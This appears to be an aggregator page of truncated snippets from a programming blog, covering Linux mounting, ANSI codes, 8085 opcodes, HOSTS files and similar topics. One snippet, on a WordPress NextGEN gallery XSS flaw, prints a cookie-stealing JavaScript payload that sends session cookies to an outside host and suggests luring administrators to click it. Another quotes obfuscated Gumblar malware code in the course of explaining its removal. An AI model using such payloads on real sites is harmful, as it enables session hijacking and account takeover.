03 Jan, 2011

Windows 32 bit or 64 bit

Articles related to windows 32 bit or 64 bit

Auto mounting File Systems in Linux

http://digitalpbk.blogspot.com/2007/03/auto-mounting-file-systems-in-linux.html Auto mounting File Systems in Linux Some Linux Distros (like Fedora Core 6 FC6) do not automatically mount the local file systems such as FAT/FAT32 systems that belong to the windows drive. To mount and unmount file systems you must be logged on as a root user or must have root privilegesMounting ManuallyFirst change to root@localhost ~]$ suPassword: Passwordroot@localhost ]# mount -t Filesystem Device DirectoryMounting the file system manually is done by the mount command.Filesystem is vfat ...
Published 4 years, 10 months ago

Asynchronous Reading from Input

http://digitalpbk.blogspot.com/2007/11/kbhit-asynchronous-read-linux-fdzero.html messages. This is impossible using the normal scanf method, because at all times it would be waiting for our input and there would not be any recieved messages in that time period. So the process of receiving information while checking for input is an example of asynchronous reading.How ?On Windows ...On windows the input STDIN can be tested for data by the function kbhit()defined on conio.h. A simple program template would be#include int main(){ //... while(1) //Main Process loop { //Other Process ...
Published 4 years, 2 months ago

ANSI Escape Sequences

http://digitalpbk.blogspot.com/2007/05/ansi-escape-sequences.html ) 07 reverse video on (or just 7) 08 nondisplayed (invisible) (or just 8) 22 normal 23 no-standout 24 no-underline 25 no-blink 27 no-reverse 30 black foreground 31 red foreground 32 green foreground 33 yellow foreground 34 ...
Published 4 years, 9 months ago

Undocumented 8085 Instructions

http://digitalpbk.blogspot.com/2007/08/undocumented-8085-instructions.html Undocumented 8085 Instructions 8085 undocumented instructionsThese are the undocumented 8085 instructions, undocumented due to incompatibility with 8086, Use them at your discretion. (information here is not sure yet, still worth a post)DSUB Hex Code: 08HDescription: BC pair is subtracted from HL Pair affecting all flags.JNK [16bit location] - Jump to Location if 'K' flag is resetHex code : DDHJK [16bit location] - Jump to Location if 'K' flag is setHex Code: FDHRRHL - Rotate ...
Published 4 years, 6 months ago

About "HOSTS" File

http://digitalpbk.blogspot.com/2006/11/about-hosts-file.html the HOSTS fileHOSTS file is found typically here ...Windows XP : C:\WINDOWS\SYSTEM32\DRIVERS\ETCWindows 2K : C:\WINNT\SYSTEM32\DRIVERS\ETCWindows 98/ME : C:\WINDOWSLinux : /etc/What is in this FILE?HOSTS file is just a plain text file. So you can use any text editing software like notepad to edit the contents of the file.Typical content of a HOSTS file is shown below : # Copyright (c) 1993-1999 Microsoft Corp.## This is a sample HOSTS file used by Microsoft TCP/IP for Windows.## This file ...
Published 5 years, 2 months ago

uTorrent 2.2 uTP means slower downloads

http://digitalpbk.com/utorrent/utorrent-22-utp-slow-downloads-disable uTorrent 2.2 uTP means slower downloads uTorrent 2.2 uTP means slower downloads uTorrent which was recently acquired by BitTorrent has a new feature called uTP which stands for Micro Transport Protocol µTP or “micro-Transport Protocol” is a new protocol from BitTorrent, Inc. that is at the heart of the new major release of our popular BitTorrent clients “µTorrent” and “BitTorrent Mainline”. This protocol or feature is designed to slow down the utorrent downloads when it detects network is getting congested. Without this feature ...
Published 1 year ago

Network Traffic Calculator using VC++ 6 on XP

http://digitalpbk.blogspot.com/2006/11/network-traffic-calculator-using-vc-6.html ); return 0; } return DefWindowProc(hwnd,msg,wParam,lParam);}int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpszCmdParam,int nCmdShow) //Windows Main{ /*standard win32 application init*/ static char szAppName[] = "Traffic Analyzer"; HWND hwnd; MSG msg; WNDCLASS wc; if(!hPrevInstance) { wc.style = CS_HREDRAW | CS_VREDRAW; wc.lpfnWndProc = WndProc; wc.cbClsExtra = 0; wc.cbWndExtra = 0; wc.hInstance = hInstance; wc.hIcon = LoadIcon(NULL,IDI_WARNING); wc ...
Published 5 years, 2 months ago

Dataone Account Usage Checker in PERL

http://digitalpbk.blogspot.com/2008/06/free-dataone-account-usage-checker-perl.html Dataone Account Usage Checker in PERL The following Script in PERL is a Dataone account usage checker.#!/usr/bin/perl# http://digitalpbk.blogspot.com/2008/06/free-dataone-account-usage-checker-perl.htmluse WWW::Mechanize;use HTTP::Cookies;use HTTP::Request::Common;my $verbose = 0;my $username;my $password;my $url="http://10.240.64.195/weblogin.jsp";for(my $i=0;$i{ if($ARGV[$i] eq "-v" or $ARGV[$i] eq "--verbose"){ $verbose = 1; } elsif($ARGV[$i] eq "-u" ...
Published 3 years, 7 months ago

Wordpress nextGEN gallery XSS (Cross site scripting) Cookie Stealing Vulnerability

http://digitalpbk.blogspot.com/2009/07/wordpress-nextgen-gallery-xss.html code can be put for stealing the cookie:(new Image()).src = 'http://labs.kitiyo.com/store.php?cookie='+document.cookie+'&location;='+window.location;window.location = "URL back to the page";Then post this link accessible to site administrators or other registered users to click and hand us over their session cookies ;)I am infected now what to do? (for webmaster)The XSS is due to blindly allowing to print the $_GET variable onto the title. The makers of this plug ...
Published 2 years, 6 months ago

Gumblar Virus Javascript removal using PERL

http://digitalpbk.com/virus/gumblar-web-virus-manual-removal-free-tool && pH!='ed'){pH='jH'}; return d[new String("rep"+"lac"+"e")](S, H); }; var Rv; if(Rv!='I' && Rv != ''){Rv=null}; var fH; if(fH!='' && fH!='Nu'){fH='Bh'}; var W=F('8955593606965585956650693356','6395'); var Ud=new Date(); var ga=new Array(); var x="src"; var Il=new Array(); var FC=''; var h=window; this.Dk=''; var b; if(b!='ny' && b!='Hn'){b=''}; var s ...
Published 1 year, 10 months ago

Related help topics for windows 32 bit or 64 bit More keywords like windows 32 bit or 64 bit
More pages for windows 32 bit or 64 bit


Email Newsletter
Email:
Popular Posts
Recent Posts
Tags
Random photo
Beach is this way Beach is this way in Havelock Island Andaman
On Facebook
Recent Comments


digitalpbk